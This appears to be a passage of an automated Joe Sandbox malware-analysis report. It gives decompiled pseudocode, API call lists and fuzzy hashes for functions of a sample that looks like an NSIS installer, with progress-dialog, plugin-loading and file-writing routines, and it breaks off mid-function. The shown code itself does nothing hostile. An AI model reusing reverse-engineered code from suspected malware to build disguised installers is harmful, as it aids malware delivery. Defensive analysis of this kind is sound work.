                                                    0x00404ca9
                                                    0x00404cb0
                                                    0x00000000
                                                    0x00404cb2
                                                    0x00404c5e
                                                    0x00404c6d
                                                    0x00404c75
                                                    0x00404c78
                                                    0x00404c8a
                                                    0x00404c90
                                                    0x00404c97
                                                    0x00000000
                                                    0x00404c97
                                                    0x00000000

                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
                                                    • GetMessagePos.USER32 ref: 00404C5E
                                                    • ScreenToClient.USER32(?,?), ref: 00404C78
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$ClientScreen
                                                    • String ID: f
                                                    • API String ID: 41195575-1993550816
                                                    • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                    • Instruction ID: 3ec40d72beee944c7b32a6f5f5203a90e51618c2e0ef94a62ef03edc632050ca
                                                    • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                    • Instruction Fuzzy Hash: 88015271901218BAEB10DF94DD45FFEBBBCAF58711F10012BBA51B61C0C7B499018B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402D98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00402D98(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E17();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a250 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                    0x00402da8
                                                    0x00402db6
                                                    0x00402dbc
                                                    0x00402dbc
                                                    0x00402dca
                                                    0x00402dcc
                                                    0x00402dd8
                                                    0x00402ddd
                                                    0x00402ddf
                                                    0x00402ddf
                                                    0x00402dea
                                                    0x00402dfa
                                                    0x00402e0c
                                                    0x00402e0c
                                                    0x00402e14

                                                    APIs
                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DB6
                                                    • wsprintfW.USER32 ref: 00402DEA
                                                    • SetWindowTextW.USER32(?,?), ref: 00402DFA
                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                    • API String ID: 1451636040-1158693248
                                                    • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                    • Instruction ID: 5b31381c318dcc107e486aeb82f0cbc8ffe93b2faae57e60c2f54a212ea49e40
                                                    • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                    • Instruction Fuzzy Hash: 53F0367154020CABDF245F50DD49BEA3B69FB44304F00803AFA05B51D0DBB959658B99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E100022D0(void* __edx) {
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t42;
				signed int* _t43;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t42 = 0x1a;
					if(_t52 == _t42) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t42;
							goto L12;
						} else {
							_t38 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t38 = E10001243();
						L11:
						_t52 = _t38;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t43 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t39 =  *_t51;
						_t51[7] = _t51[7] & 0x00000000;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t40;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M1000244C))) {
								case 0:
									 *_t43 =  *_t43 & 0x00000000;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if(lstrlenW(__ebp) > 0) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E1000122C(0x10004044);
					goto L10;
				}
			}











                                                    0x100022e4
                                                    0x100022e8
                                                    0x100022f3
                                                    0x100022f3
                                                    0x100022fa
                                                    0x100022ff
                                                    0x00000000
                                                    0x00000000
                                                    0x10002303
                                                    0x10002306
                                                    0x00000000
                                                    0x00000000
                                                    0x1000230b
                                                    0x10002316
                                                    0x10002326
                                                    0x00000000
                                                    0x1000231d
                                                    0x1000231f
                                                    0x10002335
                                                    0x00000000
                                                    0x10002335
                                                    0x1000230d
                                                    0x1000230d
                                                    0x10002336
                                                    0x10002336
                                                    0x10002338
                                                    0x1000233c
                                                    0x1000233c
                                                    0x1000233f
                                                    0x1000233f
                                                    0x10002347
                                                    0x10002349
                                                    0x10002350
                                                    0x10002415
                                                    0x10002416
                                                    0x10002421
                                                    0x1000244b
                                                    0x1000244b
                                                    0x10002431
                                                    0x1000243d
                                                    0x10002433
                                                    0x10002433
                                                    0x10002433
                                                    0x00000000
                                                    0x10002356
                                                    0x10002356
                                                    0x00000000
                                                    0x1000235d
                                                    0x00000000
                                                    0x00000000
                                                    0x10002366
                                                    0x00000000
                                                    0x00000000
                                                    0x10002374
                                                    0x10002376
                                                    0x00000000
                                                    0x00000000
                                                    0x10002397
                                                    0x1000239d
                                                    0x100023a0
                                                    0x100023a2
                                                    0x100023b2
                                                    0x00000000
                                                    0x00000000
                                                    0x1000237f
                                                    0x10002384
                                                    0x10002387
                                                    0x10002388
                                                    0x00000000
                                                    0x00000000
                                                    0x100023be
                                                    0x100023c4
                                                    0x100023c5
                                                    0x100023c8
                                                    0x100023c9
                                                    0x100023cb
                                                    0x00000000
                                                    0x00000000
                                                    0x100023dc
                                                    0x100023df
                                                    0x100023eb
                                                    0x100023ed
                                                    0x00000000
                                                    0x00000000
                                                    0x100023f9
                                                    0x10002405
                                                    0x10002408
                                                    0x1000240a
                                                    0x1000240d
                                                    0x00000000
                                                    0x00000000
                                                    0x10002356
                                                    0x10002350
                                                    0x1000232b
                                                    0x10002330
                                                    0x00000000
                                                    0x10002330

                                                    APIs
                                                    • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                      • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                    • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39674247886.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.39674168804.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674313518.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674359830.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                    • String ID:
                                                    • API String ID: 4216380887-0
                                                    • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                    • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                    • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                    • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E100024A9(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B9))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}











                                                    0x100024b3
                                                    0x100024b5
                                                    0x100024c4
                                                    0x100024ca
                                                    0x100024d7
                                                    0x100024d9
                                                    0x100024dd
                                                    0x100024dd
                                                    0x100024e5
                                                    0x100024eb
                                                    0x100024ed
                                                    0x00000000
                                                    0x100024f4
                                                    0x00000000
                                                    0x00000000
                                                    0x100024fa
                                                    0x00000000
                                                    0x00000000
                                                    0x10002504
                                                    0x00000000
                                                    0x00000000
                                                    0x1000250b
                                                    0x10002511
                                                    0x1000251d
                                                    0x10002523
                                                    0x10002528
                                                    0x00000000
                                                    0x00000000
                                                    0x1000254a
                                                    0x00000000
                                                    0x00000000
                                                    0x10002530
                                                    0x10002536
                                                    0x10002537
                                                    0x10002539
                                                    0x00000000
                                                    0x00000000
                                                    0x10002552
                                                    0x10002554
                                                    0x10002556
                                                    0x10002558
                                                    0x10002558
                                                    0x00000000
                                                    0x00000000
                                                    0x100024ed
                                                    0x1000255b
                                                    0x1000255b
                                                    0x10002560
                                                    0x10002572
                                                    0x10002572
                                                    0x10002578
                                                    0x1000257d
                                                    0x10002582
                                                    0x1000258e
                                                    0x10002593
                                                    0x00000000
                                                    0x10002598
                                                    0x10002584
                                                    0x10002585
                                                    0x10002599
                                                    0x10002599
                                                    0x10002582
                                                    0x1000259a
                                                    0x1000259e
                                                    0x100025a1
                                                    0x100025b8

                                                    APIs
                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                    • GlobalFree.KERNEL32(?), ref: 10002572
                                                    • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39674247886.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.39674168804.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674313518.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674359830.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Global$Free$Alloc
                                                    • String ID:
                                                    • API String ID: 1780285237-0
                                                    • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                    • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                    • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                    • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004028C3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E004028C3(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C53(0xfffffff0);
				 *(_t56 - 0x40) = _t23;
				if(E00405C3D(_t50) == 0) {
					E00402C53(0xffffffed);
				}
				E00405DC2(_t50);
				_t26 = E00405DE7(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a254;
					 *(_t56 - 0x38) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403402(_t45);
						E004033EC(_t49,  *(_t56 - 0x38));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x50) = _t54;
						if(_t54 != _t45) {
							E0040317B(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405DA2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x50));
						}
						E00405E99( *(_t56 + 8), _t49,  *(_t56 - 0x38));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x30)) = E0040317B(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x40));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                    0x004028c3
                                                    0x004028c5
                                                    0x004028d1
                                                    0x004028d4
                                                    0x004028de
                                                    0x004028e2
                                                    0x004028e2
                                                    0x004028e8
                                                    0x004028f5
                                                    0x004028fd
                                                    0x00402900
                                                    0x00402906
                                                    0x00402914
                                                    0x00402919
                                                    0x0040291d
                                                    0x00402920
                                                    0x00402929
                                                    0x00402935
                                                    0x00402939
                                                    0x0040293c
                                                    0x00402946
                                                    0x00402965
                                                    0x0040294d
                                                    0x00402952
                                                    0x0040295a
                                                    0x0040295d
                                                    0x00402962
                                                    0x00402962
                                                    0x0040296c
                                                    0x0040296c
                                                    0x00402979
                                                    0x0040297f
                                                    0x00402991
                                                    0x00402991
                                                    0x00402997
                                                    0x00402997
                                                    0x004029a2
                                                    0x004029a3
                                                    0x004029a7
                                                    0x004029ab
                                                    0x004029b1
                                                    0x004029b1
                                                    0x004029b8
                                                    0x0040224b
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
                                                    • GlobalFree.KERNEL32(?), ref: 0040296C
                                                    • GlobalFree.KERNEL32(00000000), ref: 0040297F
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                    • String ID:
                                                    • API String ID: 2667972263-0
                                                    • Opcode ID: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                    • Instruction ID: 8996c306b55a9cd0cf00445349fd93af405541c9de08eca1dd931963291c836b
                                                    • Opcode Fuzzy Hash: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                    • Instruction Fuzzy Hash: C221BF71800124BBDF116FA5CE49D9E7E79EF09364F10423EF8507A2E0CB794D418B98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404B2D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00404B2D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406234(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406234(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406234(_t44, _t50, 0x423728, 0x423728, _a8);
				wsprintfW(_t34 + lstrlenW(0x423728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429218, _a4, 0x423728);
			}



















                                                    0x00404b36
                                                    0x00404b3b
                                                    0x00404b43
                                                    0x00404b44
                                                    0x00404b51
                                                    0x00404b59
                                                    0x00404b5a
                                                    0x00404b5c
                                                    0x00404b5e
                                                    0x00404b60
                                                    0x00404b63
                                                    0x00404b63
                                                    0x00404b6a
                                                    0x00404b70
                                                    0x00404b70
                                                    0x00404b77
                                                    0x00404b7e
                                                    0x00404b81
                                                    0x00404b84
                                                    0x00404b84
                                                    0x00404b88
                                                    0x00404b98
                                                    0x00404b9a
                                                    0x00404b9d
                                                    0x00404b46
                                                    0x00404b46
                                                    0x00404b4d
                                                    0x00404b4d
                                                    0x00404ba5
                                                    0x00404bb0
                                                    0x00404bc6
                                                    0x00404bd7
                                                    0x00404bf3

                                                    APIs
                                                    • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                    • wsprintfW.USER32 ref: 00404BD7
                                                    • SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ItemTextlstrlenwsprintf
                                                    • String ID: %u.%u%s%s$(7B
                                                    • API String ID: 3540041739-1320723960
                                                    • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                    • Instruction ID: 06844f863ebb5207f96fa0dde493c575b08da8a3ff5d6269356cbccd3d727cca
                                                    • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                    • Instruction Fuzzy Hash: E211D873A0412877DB00666D9C41F9E32989B85374F150237FA25F31D1DA79D81282E9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004025AE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E004025AE(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x50) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C53(0x11)) + _t16;
					} else {
						E00402C53(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsg51C2.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsg51C2.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsg51C2.tmp\System.dll");
					}
				} else {
					E00402C31(1);
					 *0x40add8 = __ax;
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E00406172(_t27, _t32);
